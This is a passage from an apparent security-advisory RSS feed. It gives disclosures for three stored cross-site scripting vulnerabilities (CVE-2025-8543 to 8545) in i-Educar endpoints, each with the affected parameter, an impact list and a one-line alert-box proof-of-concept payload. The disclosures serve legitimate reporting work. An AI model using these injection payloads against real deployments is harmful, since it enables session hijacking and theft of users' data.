&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;educar_raca_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8543-cross-site-scripting-xss-stored-endpoint-educar_raca_cadphp-parameter-nm_raca&amp;#34;&amp;gt;CVE-2025-8543: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;educar_raca_cad.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nm_raca&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8543&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8543&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_raca_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nm_raca&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;educar_raca_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;nm_raca&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;nm_raca&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;CVE-Hunters&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8543/image.png&amp;#34;
	width=&amp;#34;628&amp;#34;
	height=&amp;#34;253&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8543/image_hu_657529f7cbce2b77.png 480w, /p/cve-2025-8543/image_hu_c95c71084112a8f3.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;248&amp;#34;
		data-flex-basis=&amp;#34;595px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8543.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8543.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 05 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8544</title>
        <link>https://www.cvehunters.com/p/cve-2025-8544/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8544/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8544-cross-site-scripting-xss-stored-endpoint-regraavaliacaoedit-parameter-nome&amp;#34;&amp;gt;CVE-2025-8544: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;RegraAvaliacao/edit&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8544&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8544&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;RegraAvaliacao/edit&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;RegraAvaliacao/edit&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8544-cross-site-scripting-xss-stored-endpoint-regraavaliacaoedit-parameter-nome&amp;#34;&amp;gt;CVE-2025-8544: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;RegraAvaliacao/edit&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8544&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8544&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;RegraAvaliacao/edit&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;RegraAvaliacao/edit&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;CVE-Hunters&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8544/image.png&amp;#34;
	width=&amp;#34;617&amp;#34;
	height=&amp;#34;264&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8544/image_hu_5bcb3566c566cb66.png 480w, /p/cve-2025-8544/image_hu_835b7da877dee7e9.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;233&amp;#34;
		data-flex-basis=&amp;#34;560px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8544.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8544.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 05 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8545</title>
        <link>https://www.cvehunters.com/p/cve-2025-8545/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8545/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8545-cross-site-scripting-xss-stored-endpoint-educar_motivo_afastamento_cadphp-parameter-nm_motivo&amp;#34;&amp;gt;CVE-2025-8545: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;educar_motivo_afastamento_cad.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nm_motivo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8545&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8545&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_motivo_afastamento_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nm_motivo&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;educar_motivo_afastamento_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8545-cross-site-scripting-xss-stored-endpoint-educar_motivo_afastamento_cadphp-parameter-nm_motivo&amp;#34;&amp;gt;CVE-2025-8545: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;educar_motivo_afastamento_cad.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nm_motivo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8545&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8545&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_motivo_afastamento_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nm_motivo&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;educar_motivo_afastamento_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;nm_motivo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;nm_motivo&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;CVE-Hunters&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8545/image.png&amp;#34;
	width=&amp;#34;642&amp;#34;
	height=&amp;#34;280&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8545/image_hu_c4c84f0f5992b394.png 480w, /p/cve-2025-8545/image_hu_1f598e1f64a3f4ff.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;229&amp;#34;
		data-flex-basis=&amp;#34;550px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
